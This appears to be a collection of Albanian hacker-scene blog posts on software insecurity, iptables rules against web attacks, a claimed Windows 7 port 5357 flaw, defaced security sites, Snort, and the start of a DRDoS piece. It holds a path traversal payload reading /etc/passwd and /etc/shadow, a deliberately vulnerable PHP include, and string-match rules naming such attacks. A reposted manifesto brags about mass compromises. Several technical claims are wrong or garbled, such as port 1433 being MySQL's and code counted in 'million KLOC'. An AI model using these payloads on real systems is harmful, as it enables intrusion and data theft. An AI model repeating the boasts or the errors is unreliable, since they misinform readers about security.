c0d1ng hoR30R

Kam shume kohe qe nuk shkruaj, dhe shpresoj se do rrij me shume pa shkruajtur deri tek tema e ardhshme, por besoj se kjo qe po shkruhet tani ja vlen pritjen edhe 2 vjet :).
Meqenese eshte keshtu, ja ku e kemi nje teme qe i vetmi vend ku nuk eshte tabu te flitet eshte undergroundi.
Profesioni i dyte me i vjeter eshte lufta, por edhe lufta ka zhvillimet e saj dhe sot kemi IW (Information Warrior), per te hyre ne teme po bejm menjehere disa afirmime ne menyre qe te hapen syte dhe une te kursej rreshta fjalesh (isha duke thene kodi :P).
Jemi ne fushen e informatikes, dhe meqenese jemi ne kete fushe , nuk lejohen devijime nga e verteta qoft edhe me 1 bit sepse kjo do te sillte jofunksionim te plote (siç do te shihet me poshte), keshtu qe ç’do gje qe do lexoni eshte 100% e vertete, dhe 100% e vertetueshme per ata qe duan te kerkojn argumentet per secilen nga frazat e meposhtme:

*Me shume se 3000 kompani ne kete moment jane te infiltruara nga hackerat, ç’do institucion ka siguri te thyer dhe hane exploite (thyhen) ç’do dite nga hackerat.
* Firewallet, IDS , Anti-Viruset nuk punojn aspak mire, shumica e atyre qe i shesin keto produkte kane nje mentalitet “klasik te sigurise” dhe fokusohen tek Network Security nderkohe qe duhet te fokusohen tek Software Security.
* Shumica e makinave ne internet mund te thyhen NE KETE MOMENT (perfshire makinen ku eshte i hostuar ky sit), pa perjashtuar ketu ato me programet dhe sistemet me “up – to – date” kjo sepse ne kete moment egzistojn mijera exploite te quajtura “0-day” qe eshte shume e mundur qe te qendrojn te pa zbuluara per vite me radhe, gjithashtu shume qe jane publike nuk jane ende te rregulluara si probleme.
* Nje hacker serioz mund te futet ne makinen tende ne kete moment, edhe nese ti ke nje imazh sistemmi\backup apo ç’fare do lloj metode per te rikthyer sistemin kjo nuk do e ndihmoj pasi nje “serioz” mund te infektoj pa frik firmwarin e makines, qe do i bente keto tentativa “pastrimi” jo efektive. Kjo edhe sepse nje i tille mban me vete gjithmon nje arsenal qe nuk e ndan me te tjeret, (you know) per ditet e veshtira, si i thone, “mbaje ta kesh me vete, si dihet rruges”.

Tani po thoni “WoW” ç’fare po thot ky, … nuk po e marr vesh, ku do me dal daje? Per ta bere me shume kurioz, po permend disa fakte:

– Nasa humbi 165 milion $ kur Shatelli  per ne Mars u rrezua, kjo per shkak te nje problemi ishte nje bug ne perkthimin midis anglishtes dhe njesive te llogaritjes (shume banal) qe rezultoi me gabim ne llogaritjen e trajektorjes qe rezultoj ne nje perplasje.

– Nje anije ushtarake amerikane , leshoi nje rrakete dhe shkaterroi nje avion pasagjeresh (Airbus A320) duke e mare per nje avion ushtarak. U.S ja hodhi fain programit ushtarak.

– Virusi i njohur “LOVE BUG” shkaktoi biliona deme, kjo per shkak te nje gabimi ne design te microsoft outlook i cili lejonte egzekutimin e kodit te jashtem, realisht shumica e viruseve perdorin probleme sigurie te kodit dhe jo te networkut per te bere ate qe duhet te bejn.

Virusi qe po flisnim 2 tema me pare, eshte edhe ai fakt i kesaj gjullurdie qe flitet.

E pse nuk kam degjuar une o Ardit nga keto qe po shkruan?
Le te lexojm bashk kete histori te vogel..
Ata qe kane studiuar pak software engineering, dine se programi kalon disa etapa deri sa te quhet i perfunduar, dhe nga etapat me te rendesishme eshte edhe testimi per probleme me dizajn apo ne aplikimin e ketij dizajni, i cili eshte nder me te gjatet dhe nder me problematiket sepse hshpesh here ben qe te shkruhen programet nga 0, dhe muaj te tere te shkojn ne kosh :)
Vazhdon historia.., E kemi vene re, qe sapo Apple nxjerr nje version te ri sistemi operativ, Microsoft hidhet edhe ai ne sulm dhe e nxjerr sistemin e vet para dates se caktuar, apo kur dikush nxjerr nje version te ri te programit apo funksione te reja edhe konkurrenti i tij menjehere do e nxjerri diçka te tille.
Dhe programatoret e shkret u kerkohen programe te medha dhe kur pyesin “kur te duhet i perfunduar?” shefi u pergjigjet me “dje!”.
Kjo sepse kemi te bejm me ekonomi tregu, dhe shefat zakonisht preferojn (shpesh te detyruar nga kushtet e egra te xhungles) te marrin leket ne moment se sa te humbin bleresat dhe te ngelen me nje program (relativisht te sigurt) por me pak bleres per shkak te voneses dhe mbizoterimit te tregut nga konkurrenca.
Nga kjo nxjerrim se tregu sot i programeve eshte parajsa e intruderave, me treshen e rendesishme qe vjen e forcohet:
Kompleksiteti Microsoft word ne fillim ka pasur vetem 15000 rreshta kod ndersa ne 95 pati 2000000 ndersa sot 10’000’000 kjo per nje hacker do te thote “njam njam njam”.
Pse , sipas llogaritjeve ne 1 KLOC (njesi matjeje per sasine e kodit) mund te kete nga 5 bug deri ne 50 bugzzzz dhe ky eshte ligj universal. Imagjinoni se sa mund te kete ne 1000000 KLOC? dhe ketu po flasim vetem per nje aplikacion, pa llogaritur aplikacionet e tjera, sistemin operativ, firmwaret, dhe edhe vet sistemet mbrojtese, antiviruset, firwallet….
Windows XP ka 40 milion KLOC, ndersa Windows 7 mendohet 120 milion. (pa programe te instaluara siper, vetem sistemi i fresket).
Dhe per “ata te sigurise” ligji eshte ligj, “me shume kod, me shume bugz”, besoj se tani e kuptoni frazen e çuditshme qe mund te keni hasur ne underground “keep it simple stupid”, e meqe ra fjala:

Ekstensibiliteti kjo eshte arsya kryesore e perhapjes se viruseve, sot programet nuk behen me kompakt si njehere e nje kohe, por sot kemi VM, plugine, shkurtimisht kode qe mund te perfshihen nga nje faqe e jashtme ne internet dhe te egzekutohen direkt ne makinen tende. Kjo eshte trend ne kete moment, dhe nese nje program nuk eshte i tille atehere nuk eshte i “mire”.Per me shume kerko ne google (nese nuk e di) per “Code Red”
dhe historine e tij me serverin e Microsoftit IIS
dhe pika e 3-te e “treshes e famshme” eshte:

Konektiviteti Ne momentin qe po shkruaj kete tem, kam hyre ne internet nepermjet iPhon-it me “internet tethering” dhe e kam lidhur me kompiuterin me USB. (Shih Settings>General> Network> Internet Tethering çoje On). dhe sot siç shkruhet tek “THE TCP-IP GUIDE” eshte e veshtire te mbash 2 aparate elektronike jo te lidhur me njeri tjetrin, kjo ka krijuar mundesine e sulmeve te automatizuara, pra ne momentin qe nje virus apo nje sulmues infekton nje range ip-sh shikon per te tjera, dhe per ta ber kete i duhet vetem nje skanim.

Rrenja e Problemit.

Vetem nje fjale, BUFFER OVERFLOW, aplikacione qe te lejojn te egzekutosh aplikacionin tend ne nje sistem te caktuar, ku ka me mire, vulnerabiliteti qe te lejon diçka te till te lejon kontroll te plote mbi sistemin.
Kjo eshte arsyeja qe e gjithe ajo qe eshte shkruajtur me siper po ndodh, dhe mbrojtja ndaj ketij lloj sulmi eshte shume minimale per te mos thene jo-egzistuese, pasi edhe nese keni firewall, antivirus, apo IDS ai do te monitoroj gjera “standarte” siç u tha ne fillim, psh ç’faj ka firewalli nese ti duke vizituar me internet explorer nje faqe interneti kthehesh ne nje zombie (kompiuteri yt, jo ti) , kodi kalon ne menyre legjitime dhe nese firewalli bllokon porten atehere nuk ka me internet dhe ti s’ke mundesi te lundrosh, e njejta gje me anti-viruset te cilet nuk jane te pergjegjshem nese me ane te nje aplikacioni (te besuar) egzekutohet kod (qe zakonisht mund te jete i maskuar dhe mund te duket normal) nga ky aplikacion dhe sistemi kompromentohet.
Nga keto kuptuam se mbrojtja kunder ketyre lloj sulmesh eshte shume e veshtire, kjo per disa arsye:
1) Nuk mund te monitorohet i gjithe kodi i te gjitha aplikacioneve, edhe nese behet nga ta dalloj sistemi mbrojtes qe ai kod i caktuar eshte kod keqberes dhe jo kod qe po e egzekuton programi? (po mendon tani per Snort dhe db e tij te firmave te shellkodeve dhe exploiteve te ndryshme) edhe nese do te kishte fatin te kapte nje te tille (ne rastin se sulmuesi po perdor diçka te gjetur rrugeve dhe jo te koduar vet [rast fillestaresh] nuk do te ishte ne gjendje ta ndalonte).
2) Sistemet e sigurise sot, maksimumi qe mund te bejn eshte te lajmerojn per nje sulm te till por jo ta parandalojn, (shume te pakt jane ata qe mund ta bejn).
3) Keto lloj vulnerabilitetesh kane te bejn me programatorin me shume se sa me vet programin, keshtu qe nuk ka diçka standarte, eshte gjithmon problem qe mund te ndodhet kudo ne 30000 rreshtat e kodit qe mund te kete shkruajtur dikush. Fakt per kete qe thash, provo te kerkosh ne google me “buffer overflow vulnerability scanner” dhe shiko rezultatet, asnje aplikacion per te bere diçka te tille, nderkohe qe kerko me “port scanner” apo “vulnerability scanner” dhe shiko listen se ku perfundon. Kjo eshte fakteqesi.
4) Tendenca per te nxjerr programet sa me shpejt, e ben kete problem gjithmone e me kritik, keshtu qe mendoni pak per programet gjysem te perfunduara ku edhe per ate qe jane programuar nuk e bejn plotesisht, ç’fare impakti ne nivelin e sigurise mund te kene ato ne nje sistem?
Vetem nje fjale: FATAL.

Si pasoje e ligjit te BUG-eve , dhe si pasoje e arsyeve qe u listuan me siper, ato qe u thane ne fillim te kesaj teme jane plotesisht te verteta, dhe nuk kane egzagjeruar ata qe thane “nje sistem i sigurt eshte nje sistem i fikur, i mbyllur ne nje burg te siguris maksimale i rrethuar me roje te armatosur me shot-gun”.
Mbas kesaj, mund te kuptoni fraza te tilla qe mund te gjenden tek zfo05 (kerkoje se eshte postuar ne kete blog)

“Apologies for the poor quality of the hacklog, but I’m old now and let’s face
it, Kevin Mitnick is done. You can move your box anywhere Kevin, we’ll find you
and own you. You should know best, it’s the “hacker” in us – or something like
that…See you soon.” — ky ishte mesazhi i lene nga profesionist “Kevin Mitnickut” te madh, “HACKERIT” legjendar, bytw FU** Y*U Kev.

Per ta perfunduar:

_____________________________________
Between us and people we know, everything is owned. We keep owning shit that
others have, they own some shit we already have. We don’t exactly hire
secretaries to sort this out.

We’re colonizing the internet the way Europe colonized Africa, cutting it up
into little pieces. We have your accounts, your mail, your dev box, your host,
and your ISP. Code exec on your lappy if we think it’s worth the hassle. We
have so much shit owned we can’t manage, or even remember, half of it
. Targets
pop up and we have to ask ourselves if we already have it, because we just don’t know.

We could set up franchises like McDonalds, one on every corner of the net, over
99 billion served. Supplying you with artery-clogging hax morning afternoon and
night.

We need some goddamn staff, we’re a billion dollar enterprise running on a
lemonade stand budget. If there was much useful help out there, we’d hand out
root passes like candy on hallowe’en. That’s just a pipe dream, we just find
more people we can’t trust. Anyone useful is as busy as we are. Thank your
lucky stars we ramble on.
____________________________________________________

Ky eshte realiteti.
Mire, dikush (supersticioz) eshte duke pyetur veten e tij, per arsyen qe me shtyu te shkruaja kete…
Faktikisht jane shume arsye..
a) Me pelqen e verteta, dhe me pelqen te demaskoj te paverteten, sidomos kur shemb iluzione. (kjo per te bere te kuptohet qe ajo qe shitet sot me emrin “siguri” eshte fraze boshe, dhe te flasesh kete qe eshte shkruajtur ketu eshte tabu sepse biznese te tera bazohen ne keto iluzione).
b) Materiali eshte shume i mire per programatoret qe nuk duan te pushohen nga puna se programi per te cilin ke bere dark te madhe e ke festuar me miqt, 1 vit me vone ben qe kompania blerese te humbi 1’000’000$
c) Me pelqen :)

Te zgjerojm limitet e iptables

Jemi ne nje nga temat me * ketu ne albanianwizard.org, them me * sepse ky eshte nje koncept origjinal i patrajtuar me pare, koncepti eshte te kthejm Iptables firewall ne IPS (Intrusion Prevention System), dhe shkrimi eshte paksa i nje niveli te avancuar (kjo edhe pse jane koncepte te reja dhe jo diçka e perditshme) keshtu qe nese nuk  keni informacione se ç’fare jane:
buffer overflow
sql injection
CSS (XSS)
Local File Inclusion , RFI (remote file inclusion) dhe nuk keni te qarte –string te iptables atehere eshte me mire te kaloni ne teme tjeter pasi ne kete teme nuk do te sqarojm sulmet por metoden se si mund te “bllokohen” keto sulme, gje qe e kthen iptables ne nje IPS, por ky eshte thjesht nje koncept dhe shume sulme te alteruara mund te rezultonin te sukseshme edhe mbas metodave mbrojtese qe mund te aplikojm (e shohim me poshte), por kjo vetem ne rastet kur perdoret buffer overflow (stack\heap – overflow), ne rastet e tjera mbrojtja eshte shume efikase.

iptables VS buffer overflow
Sulmet me te rrezikshme sot, nuk jane ato qe i drejtohen sistemit, apo nje platforme por ato qe i drejtohen drejtpersedrejti vet aplikacionit ,  le te shohim sebashku dhe arsyen.
Nje firewall ne pergjithesi do te shkoj dhe do te monitoroj portat qe jane te mbyllura, apo te filtruara dhe do te anashkaloj monitorimin e portave 80\22\25 etj ku nje server ofron sherbimet e veta “duke ja lene ne dore” keshtu sigurine vet aplikacionit qe eshte duke perdorur porten. [gabim ky qe lejon shumicen e sulmeve qe ndodhin sot]
Kjo sjell qe keto sulme nga ana tjeter te jene te suksesshme dhe ne sisteme jo te rregulluara (not hardened) edhe te pakapshme.
Te shohim disa rregulla qe mund ti impostojm iptables kunder disa sulmeve normale.

Iptables VS buffer overflow

Ky edhe pse sulm goxha i vjeter ne ‘moshe’ eshte edhe ne kete moment shume i perdorur dhe tipik per nje root account.

Shfrytezohet nje aplikacion i koduar ne C\C++ zakonisht dhe nje funksion malloc()  strcat() scanf() , strcpy() i pa kontrolluar me ane te se cilit arrihet ne zona te memorjes qe nuk duhet te jene te aksesueshme, duke ber “rishkrim” te ketyre zonave ne RAM e rjedhimisht nese hyet ne zona te rezervuara te memorjes si ato te sistemit operativ atehere mund te modifikosh pid-t e proçeseve e keshtu dhe uid (root @ uid= 0) dhe sistemi kompromentohet.
Rasti tipik eshte nje reverse shell qe lidhet me makinen e sulmuar.
Keto lloj sulmesh jane shume te veshtira per tu kapur, edhe nese nje sistem ka firewall dhe antivirus nuk ka shance kunder nje exploiti 0-day. Nje zgjidhje ne keto raste do te ishte nje fwsnort i integruar me snort + iptables normalisht dhe te shpresonim qe sulmi te njihej nga snort, ose me sakt snort te kete te regjistruar ne db shellin qe eshte duke perdorur sulmuesi.
Po marrim nje rast se si mund te bllokojm nje te tille nga porta 443 ku dihet qe per te bere overflow e mbushim hapesiren e memorjes me karaktere ç’faredo pastaj kur jemi ne hapesiren e duhur perdorim shellcode (ku shumica e atyre qe perdoren jane ne db e snort)
iptables -I INPUT 1 -p tcp –dport 443 -m string –string “AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAA” -j DROP
Ne kete rast vihet re mire pjesa me “AAAA” e cila nuk do ishte e zakonshme, ne keto raste keshtu qe kjo lloj lidhjeje do te duhej te ndalohej.
Nje menyre per ta anashkaluar gjithsesi eshte qe ta mbushesh me BBBB ose CCCC ose me ABDEF… keshtu qe siç e thashe do te duhej nje snort i konfiguruar mire per tu marre me keto lloj sulmesh, por ne shumicen e rasteve kodi i exploitit perdoret nga worme, boote keshtu qe pjesa me siper mund te jete shume efektive.

iptables VS sql Injection

LoL, ne kete rast nuk kemi ç’fare te sqarojm, shkoni tek nje PKSH-crew dhe do jete gjeja e pare qe do u mesojn, ne keto raste duhet te evitojm string si “select, union, from, apo karaktere null”, dikush i zgjuar eshte duke menduar tani, se edhe nese ne bllokojm union, select etj etj duke njohur mire iptables mendon po sikur ti fus ne hexadecimal karakteret e sql injection?
Dhe ben mire te mendoj keshtu pasi mund ti behet evazion kesaj metode mbrojtese por per fat te mire iptables ka dhe opcionin –hex-string dhe per ta bllokuar nje null character ne hex do te ishte diçka e tille:
iptables -I INPUT 1 -p tcp –dport 1433  -m string –hex-string “‘|00|” –algo bm -m string –hex-string
“-|00|-|00|” –algo bm -j REJECT
Siç e shohim porta qe monitorohet eshte 1433, pra e mysql-s . Me sa me shume opcione gjithperfshirese, aq me pak do te ishin shanset per te pasur nje sulm te suksesshem, e ne kete rast duke marre parasysh nje server dhe 2000 website te hostuara ne te, do te ishte nje LAJM MADHESHTOR per klientet qe do e ndienin veten nen nje sherbim perfekt.

iptables VS Local File Inclusion

Ne keto raste, perdoret nje fail psh nje php dhe me ane te tij mund te aksesohet nje fail tjeter ne direktori, psh e zeme se faili yne skedari.php ka nje rresht ku shkruhet ky funksion:

 require("./../".$_GET["emriskedarit"]);

Duke pare thjesht me browser nje file te tille dhe duke perfituar nga ndonje funksion mund te shkojm direkt tek:

file.php?shko_tek=../../../../../../../etc/passwd%00
Ose mund te jete nje config.php, ose mund te jete nje /etc/shadow%00
Thame qe per keto perdorim browserin keshtu qe porta per tu monitoruar eshte 80 (web-server).
Keshtu qe:
iptables -I INPUT 1 -p tcp –dport 80 -m string –string “/etc/shadow” –algo bm -j REJECT
ose
iptables -I INPUT 1 -p tcp –dport 80 -m string –string “../../” –algo bm -j REJECT

iptables VS CSS (XSS) dhe RFI

Ketu besoj se imagjiononi vet…

shembull kunder Cross Site Scripting

iptables -I INPUT 1 -p tcp –dport 80 -m string –string “<>” –algo bm -j REJECT

Shembull kunder Remote File Inclusion
iptables -I INPUT 1 -p tcp –dport 80 -m string –string “=http://” –algo bm -j REJECT

Windows 7 Ultimate 0-day vulnerabilitet

Hellooooo 😀
Gabimisht, dhe per kuriozitet isha duke eksploruar pak nje Windows 7 Ultimate, e vertet kane bere goxha pune ne krahasim me versionet e meparshme si stabiliteti etj por mbas instalimit pashe diçka shume interesante.
Porta 5357 qendronte gjith kohes ne Listening (ne TCP dhe UDP) dhe jo nga nje proçes dosido por nga vet sistemi :)
Ky vulnerabilitet na lejon qe te terheqim informacione dhe te dergojm informacione te rrezikshme sistemit, diçka e tille eshte e lejuar dhe nga firewalli i windowsit te pakten keshtu tregoi skanimi me nmap dhe lidhja me netcat e me browsera gjithashtu.
Meqenese porta menaxhohet nga System atehere informacionet qe mund te dergohen dhe merren mund te jene kritike.
Per momentin nuk ka zgjidhje nga Microsoft, dhe reportin ta bej ndonjeri nga ju qe po lexoni kete postim.
Nuk e mbajta priv8 pasi heret a vone do dilte, keshtu qe sorry nese po fyej ndonje blackhat.
(Ah, per ata qe po e perdorin keshillohet instalimi i nje firewalli te mire dhe filtrimi i portes, kjo do e zgjidhte problemin.)
Testimi u be ne nje Windows 7 Ultimate, por besoj se dhe versionet e tjera duhet te jene vulnerabel.
Ky vulnerabilitet mund te perdoret gjithashtu per te explotuar aplikacione qe gjenden mbas firewallit te instaluara ne sistem.

3l!t3 g0t h4ck3D

E keni degjuar ate shprehjen : “Asgje nuk mund ta ndaloj nje hacker”?

Eshte e vertet!
Perpara se te hyjm ne teme te shpjegojm pa diçka qe e kam thene ketu e 3 vjet ne nje forum underground, e sigurisht miqve te mi qe i pershendes e mbajn mend mire.
Fola per Kevin Mitnick qe nuk eshte Hacker dhe eshte thjesht nje bufon qe e ka vene ‘shteti’ si dordolec per te perhapur dizinformimin tek njerezit, e si ai ka dhe te tjere si shume qe marrin pjese ne Defcon, Dan Kaminsky, rsnake, website si milp0rn me shoket e FBi-s e keshtu me rradhe.
Per ata qe sadopak jane ne brendesi te kesaj, e kuptojn shume mire ate qe kam shkruajtur me siper.
Kev, e ka ngrene edhe nga te tjere, per tu permendur Cyber-T qe ka hequr dhe koka te tjere perfshire irc.milp0rn qe ka qene aktive ne ate kohe, e gjithashtu dhe FBH, e te tjere qe nuk publikojn tek zone-h.
Nese nuk u mbushet mendja dhe jeni shume te mashtruar hidhini nje sy e zgjohuni:
http://www.zone-h.org/archive/ip=65.254.38.202

E Eldo, kisha te drejt xD? sp1d3r.. kisha te drejt?
Them dizinformim, sepse u mbushet mendja edhe atyre qe duan te behen ” HACKERA ”  me pallavra dhe asgje me shume, per tani eshte teme goxha e gjate per tu trajtuar, gjithsesi gjat leximit te kesaj e-zine qe ka publikuar autori i cili ka penetruar websitet e me poshtme:
mitnicksecurity.com (Kevin Mitnick)
0×000000.com (Ronald van den Heetkamp)
doxpara.com (Dan Kaminsky)
perlmonks.org (Perl Monks)
elitehackers.com/info (EliteHackers)
binrev.com (Binary revolution)
invisiblethingslab.com (Joanna Rutkowska)

Te gjithe keto shume te njohur si “hackera” apo gaboj?
Do thoni ju, ne baze te ligjit me siper i bie qe ç’do hacker mund te hakohet nga nje hacker tjeter, e vertet ashtu eshte, askush nuk eshte 100% i mbrojtur por ketu nuk eshte fjala per kete, ketu eshte fjala per dizinformimin qe kane perhapur keta persona me librat\videot\konferencat e tyre.

Po u le ne shoqerine e ketij e-zini shume te mire :)
http://albanianwizard.org/3z1n3s/zf05.txt

Lexim te kendshem !!
Ps, te rinjve shqiptar qe duan te merren me keto pune, realisht nje H te vertet e dalloni sepse:
A) Nuk njihet dhe askush nuk ka degjuar per te.
B) Websaiti i tij vizitohet nga nje numer i limituar personash
C) Nuk mburret dhe nuk tregon per aftesit e tij (eshte ne kundershtim me karakterin) dhe jane shume realist
Mesazhi perfundimtar, nese nuk ploteson keto kushtet qe citova ketu, dije se nuk je ne underground dhe undergroundi nuk eshte ai qe kujton ti 😉

Paper per IDS-n me te njohur open-source SNORT

Pershendetje, shpresoj se po i kaloni mire pushimet :)
Ndoshta kjo teme mund te jete shume fitimprurese pasi do te trajtohet nje paper i gjat mbi temen “Owning Your Linux Box with Snort” .
Shpresoj qe kjo teme mos ti drejtohet vetem nje pakice siç i jane drejtuar tema te tjera si:
DRDOS – proof of concept (teknike e bazuar ne spoofing)
Teknika per Bypassimin e sistemeve mbrojtese me nmap
e te mos flasim per temat assembly :( .
Thash qe shpresoj te mos i drejtohet vetem nje pakice sepse realisht shumica e shqiptareve e sidomos ne,  nuk e perdorim linux e te mos flasim per konigurimet e IDS-ve dhe shnderrimet e tyre ne IPS , teknikat e mbrojtjes\sulmit.
Keshtu qe , nese doni te merrni vesh pak nga ato qe jane shkruajtur preferohet te keni njohuri mbi protokollin TCP\IP, IDS-t , dhe te keni intuite te mire.
Gjithsesi do te perpiqem ta trajtoj sa me kuptueshem qe te jete e mundur keshtu qe edhe ju qe nuk ja keni idene, gjat leximit do kuptoni shume shume shume gjera.

Permbajtja

1. Hello World
2. Instalimi dhe Konfigurimi i Snort
3. Plugins dhe Add-ons
4. Kunder Krakerit..?!
5. Snort Hardening – Snort si IPS?

1. Hello World

Realiteti Open-Source

Shumica e atyre qe kam pyetur se pse kane kaluar ne linux perveç motiveve te tjera eshte se ka egzistuar gjithmon tek ata deshira per ta njohur me themel sistemin operativ dhe shpesh me jane pergjigjur me:

“Duhet ta perdoresh ti sistemin dhe jo ai ty”

Ky per mendimin tim eshte çelesi me i fuqishem i filozofis open-source pasi te shohesh ate qe egzekutohet /kompilohet / interpretohet eshte me shume se liri, eshte Linux.

Por kjo perseri nuk na çon ne frazen qe sapo degjuam, kjo na çon thjesht ne ate qe ne e dime se ç’fare egzekutohet ne makinen tone dhe mund te kontrollojm dhe modifikojm gjithçka qe duam nese ne terminalin tone shkruhet ~#
Linux ne ndryshim nga windows ta jep pra mundesine per ta shfrytezuar, le ta shohim se a ka limite ky shfrytezim.

IDS (intrusion detection system)

Pse pikerisht nje teme rreth Intrusion Detection System?

Sot siguria eshte nje pik jetesore ne ardhmerine e nje biznesi dhe meqenese nuk mund te jete kurre 100% njerezit nuk mjaftohen kurre me te.

Keshtu qe , IDS-t jane nje pike shume e forte ne mbrojtjen e nje networku dhe ju jeni te interesuar ne mbrojtjen e networkut tuaj apo jeni nga ata qe thone “ajo qe nuk e di , nuk te vret?” e, nese jeni nga ata po u listoj motivet se pse nje intruder do te ishte i interesuar ne networkun tuaj.

1) Profit, vjedhje-shitje te dhenash themelore.

2) Konkurrenti juaj deshiron tju shohi down per nje kohe te mire, dhe ajo kohe qe ju jeni me probleme apo duke rregulluar probleme eshte lek i shkuar kot.

3) Ndonje kurioz, eshte duke testuar aftesite e tij ne networkun tuaj, dhe ka nga ata qe kujdesen qe te mos demtojn e ka nga ata te tjeret qe nuk e ka problem te japi nje rm -rf /

IDS-t ndahen ne 3 kategori:

NIDS – Network Intrusion Detection System nga vet emri monitoron segmentin e networkut dhe analizon trafikun e tij.

HIDS – Host Intrusion Detection System ne ndryshim nga NIDS mbron vetem hostin ne te cilin eshte instaluar, por ka avantazhet e veta ne aspektin e konsumit te proçesorit si dhe modifikimit te rregullave , psh nuk duhet analizuar nje host per exploite te DNS-ve kur ai nuk e ka ne egzekutim ate sherbim..

DIDS – Ketu behet fjale per networke te medhenj ku kemi shume NIDS\HIDS dhe DIDS eshte nje lloj menaxheri i cili te jep mundesine e kontrollit te centralizuar.

PO SNORT?

Tek http://www.snort.org lexojm:

Snort ® is an open source network intrusion prevention and detection system (IDS/IPS) developed by Sourcefire..

Por snort nuk eshte vetem aq, ai eshte dhe nje dhe packet sniffer dhe nje packet logger shume i mire.

Snort eshte si nje hapesire vakumi qe thith te gjitha paketat dhe te lejon ty te besh shume gjera me to,, ne nje fare menyre mund te personifikohej me :
Snort

Perveç kesaj, Snort jep lajmerime ne kohe reale per intruzione te mundshme duke i dhene ne kete menyre nje aspekt IPS ketij IDS-je tejet te kompletuar.

Ne pergjithesi, te gjith IDS-t kane nje packet sniffer me te cilin kapin paketat dhe i depozitojn diku pastaj nje packet logger i analizon paketat ne baze te disa rregullave dhe kushteve qe mund te kete, por ç’fare e bene SNORT nje IDS kaq popullor?

Arsyet se pse Snort eshte kaq popullor jane pikerisht kapacitetet e tij si IDS ne rregulloren e tij me ane te se ciles mund te dalloj shume shpejt nje malware, nje port-scaning, nje buffer overflow e keshtu me rradhe, gjithashtu dallohet sepse eshte nje IDS qe nuk kerkon shume resurse dhe nuk kerkon ndonje platform\server te posatshem per tu egzekutuar.

Per shak te minutazhit dhe limitimit se ky shkrim eshte nje paper dhe jo nje liber do perpiqemi ti permbledhim “cilesite” e SNORT i cili mund te jete nje solucion perfekt per networke te nje shkalle te vogel dhe mesatare.

Gjithsesi, SNORT ne fillim eshte publikuar ne packetstoormsecurity dhe ne vitin 1998, ka pasur vetem 2 faile dhe gati 1600 rreshta kodi, ishte ne ate kohe nje snifer i ndertuar siper libcap (u ndoq shembulli i tcpdump).
Le te shohim realisht ato qe e bene SNORT IDS-n # 1 open-soruce.

PIKAT E FORTA TE SNORT [ARKITEKTURA]

Te shohim nje figure imagjinare te arkitektures qe ka serveri SNORT.

Arkitektura Snort

SNIFERI – eshte software ose hardware i cili “troket” leht ne network duke kapur paketat, e ne rastin e SNORT sniferi eshte shume i kompletuar dhe ofron monitorim si ne TCP\UDP\ICMP etj.

PREPROÇESORI – eshte pjese e cila kryen filtrimin e paketave raw (kujto raw-socket) dhe ne baze te plugineve percakton nese nje pakete eshte normale ose jo, duke e kaluar tek ‘MOTORRI’ ose duke e hedhur (drop).

MOTORRI – ky eshte vet SNORT ne pake fjale, pra zemra e tij. Pasi ka marre paketat nga Preproçesori i krahason keto paketa me rregullat (te cilat axhornohen dita dites) dhe nese paketat perkojn me njera-tjetren (ato te kapurat me ato qe gjenden tek motorri) atehere SNORT rregjistron logun ne databaze dhe krijon nje alarm ne kohe reale.MOTORRI i krahason paketat me rregullat ne baze te 2 parimeve:

Rregullorja e Headerit (duke kontrolluar flamurin [flag] te paktes pra nese eshte SYN\ACK\FIN\URG\PUSH

Rregullojra e Opcionit nese permbajtja e paketes apo “firma” (signature) e saj eshte e njejte me ato qe jane tek RREGULLAT.
ALARMET DHE DATABAZA – ketu kemi mundesi te gjere zgjedhjeje midis plugineve te ndryshme, si dhe databazave.
Te gjith keto komponent permirsohen nga dita ne dite, dhe algoritmet per analizimin e paketave , permirsohet databaza e signaturave dhe shtohen performancat dhe opcionet.

Perfundoi pjesa e pare e Paperit.

DR-DOS – ta çojm kete teknik ne nje nivel tjeter.

Jemi perseri me temat rreth siguris ne informatik..
Kesaj rradhe me nje teme pak me te frikshme se te zakonshmet 😀

Eh, e di DR-DOS eshte tashme nje teknik shume e vjeter, por duke menduar mbi postimet e fundit ketu ne albanianwiard.org  dhe nje aplikacioni si ftester i shoqeruar me nmap kjo teknik mund te shnderrohet vertet ne nje makth te mirfillt.

Une nuk mbaj asnje lloj pergjegjsie per informacionin e meposhtem, dhe falenderoj Zotin qe script-kiddiez nuk dine mire programim sepse do shihnim webe qe ca dite jane online e ca dite te tjera ofline.
Keto informacione jane vetem per qellime edukative dhe me e rendesishmja:
a) Zhvillimin e te menduarit
b) Mesimit se ke nje tru, dhe nese e perdor ka frute (ja pse te tjeret kane rezultate te tjera nga ti)
c) Te menduarit ben diferencen, dhe ben qe te zhvendosesh nga stadi ‘copy-paste’ ne ‘brain-fuck’

Dy fjale per sulmin DRDOS ose Distributed Reflection Denial of Service, qe rrjedh nga DDOS e ky nga ai me i vjetri DOS…
Nese nuk dini se ç’fare eshte nje DOS e nje DDOS atehere, hidhini nje sy neper web, ndryshe do e keni pak me te veshtire per ti kuptuar gjerat..
Atehere fillojm ngaaaaaaaaa…..

HANDSHAKE

Ne baze te ligjeve te networkut njihet qe ne protokollin TCP qe Daku me Pakun te komunikojn me njeri-tjetrin duhet te ndodhi nje handshake..
Nje pakete qe del nga kompiuteri mund te kete si Flamur (flag) SYN , ACK, NULL, FIN, URG, e keshtu me rradhe pra ne baze se ç’fare eshte dhe ç’fare kerkon te bej..
Nuk po e komplikojm shume..
Daku do te lidhet me Pakun… Si i behet?
Daku ==== SYN (kerkese per sinkronizim) ======>>> Paku
Paku =====SYN/ACK (e njohu kerkesen per sinkroniim =====>>>Daku
Daku =====ACK===(Ok, fillojm te flasim)======>>>Paku

Ok, e morem vesh, pra keto jane siç quhen fazat pergatitore per fillimin e komunikimit midis clientit dhe serverit.
Vijm tek DR-DOS..
Siç e dime Denial of Service ne thelb konsiston ne ate qe ti mohoet sherbimi nje serveri e ne fjale te tjera te konsumohet bandwithi dhe serveri mos te jete ne gjendje qe tu pergjigjet paketave SYN, ..po po SYN sepse dergohen vetem paketa SYN ne seri dhe duke qene se dergohen me shumic brenda nje kohe shume te shkurter serverit te sulmuar i grumbullohen kerkesa per lidhje nga shume ane (ne rastin e DDOS) dhe nuk mund ti menaxhoj e keshtu del offline.Por ne rastin e DR-DOS kemi diçka shume me te “bukur” per ata qe e shohin si shkenc kete qe po flasim dhe “shpifur” per ata qe i keqperdorin keto njohuri.
